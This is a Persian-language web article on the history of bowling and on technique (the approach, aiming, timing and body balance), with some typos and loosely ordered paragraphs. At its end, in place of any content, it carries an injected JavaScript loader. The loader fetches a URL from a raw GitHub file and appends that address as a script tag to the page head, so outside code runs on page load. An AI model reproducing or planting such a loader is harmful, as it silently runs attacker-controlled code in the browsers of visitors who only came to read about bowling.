تاریخ ورزش بولینگ برمی گردد به مصر باستان، البته نه به این صورتی که الان می ببینید. بعد از دوران باستان خیلی ها شروع بولینگ را از آلمان می دانند. قوانین این بازی هم به صورتی که الان در همه جای دنیا بازی می کنند سال 1895 در نیویورک ثبت شده است. حالا بیش از صد سال است که بولینگ در همه دنیا قوانین خاص خودش را دارد. برای بازی کردن به جز دانستن قوانین به یک کفش و توپ احتیاج دارید.در چند سال اخیر بولینگ در ایران هم طرفدارهای زیادی پیدا کرده و خیلی ها به صورت یک ورزش حرفه ای آن را دنبال می کنند .
توپ را از روی ریل برگشت بردارید. توپ را با هر دو دست بردارید. بازو را خم کنید و به سمت مسیر ورودی بروید. بهتر است تا به مسیر ورودی نرسیده اید انگشتان را داخل سوراخ های توپ فرو نبرید چون ممکن است مجبور شوید صبر کنید تا بازی بازیکن دیگری تمام شود. این کار باعث خستگی یا عرق کردن غیرضروری انگشتان تان، بخصوص انگشت شست می شود.
هدف سوم نشانه گیری دقیق با توپ است. عدم تعادل و در واقع تغییر برای حفظ تعادل ممکن است شما را وادار کند متمایل شوید یا کلا باعث شود از مسیر منحرف شوید که در هر دو حالت شما را از نشانه گیری دقیق دور می کند و باعث می شود توپ را از سمت راست یا چپ نقطه مورد نظرتان رها کنید.
نشانه گیری
نشانه گیری در ورزش بولینگ امری بسیار مهم است. اگر نتوانید باتوپ هدف را مشخص کنید توپ در جای درست به پین ها برخورد نمی کنند.
زمان بندی و حفظ تعادل
در بولینگ مسرس ورودی دو معنی دارد
فسمتی از مسیر اولیه قبل از فول لاین که می ایستید و توپ را پر تاب می کنید. حرکت مشخصی که در این مسیر انجام می دهید و توپ را می چرخانید تا به طرف پایین پرتاب کنید.
تعادل بدن
تعادل بدن در واقع یکی از مهمتزیت عوال است که باعث میشود توپی که شما پرتاب می کنید به مانع ها برخورد کند. نظیم تعادل برای جلو گیری از سقوط شما است.
هدف اول تولید انرژی است که ضمن تنظیم مجدد تعادل در بازی انرژی هدر رود و بع توپ منتقل نمی شود.
هدف دوم هماهنگی حرکات پاندونی با قدوم هاست. تا زمانی که توپ را رها کنید این حرکات باید هماهنگ و موزون باشند.
اگر دوباره تعادل بر قرار کنید حساسیت زمان به هم ریخته و برای انتقال انرژی به توپ مجبورید آن را زودتر یا دیرتر از موعد رها کنید که بستگی به پرتاب شما دارد.
رمز موفقیت در حرکات مسیر ورودی و تحول صحیح توپ و از بین بردن عدم تعادل در حرکاتی است که نیاز به اصلاح آگاهانه دارد اما قبل از اینکه بتوانید عدم تعادل را از بین ببرید باید آنها را تشخیص دهید. مسئله این است که مغز ما به خودی خود برای برقراری تعادل طراحی شده استف بنابراین مجبور نیستیم به هر قدمی که برمی داریم فکر کنیم.
بیشتر بازیکنان بولینگ به علائمی که موجب عدم تعادل و اصلاح حرکات می شوند، آگاهی دارند و توپ در مسیری که انتظار دارند نرفته است. پس آنها به جای اصلاح علل اصلی مشکلات، با افزودن حرکاتی اضافی و غیرمعمول در حرکات مسیر ورودی، آنها را بهبود می بخشند.
متاسفانه این تنظیم معمولا عدم تعادل بیشتری را به وجود می آورد و در نتیجه اصلاح آگاهانه بیشتر می شود. این حرکات غیرمعمول و نشاندهنده گرفتاری هایی است که بعضی بازیکنان دارند. راه حل این است که به جای مبارزه آگاهانه با سیستم تعادل بدن با آن کنار آمد. گاهی به تغییرات اصلاحی ضمیر آگاه را متوجه می کند و به عدم تعادلی که لازم است از بین برود اشاره می کند.
(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)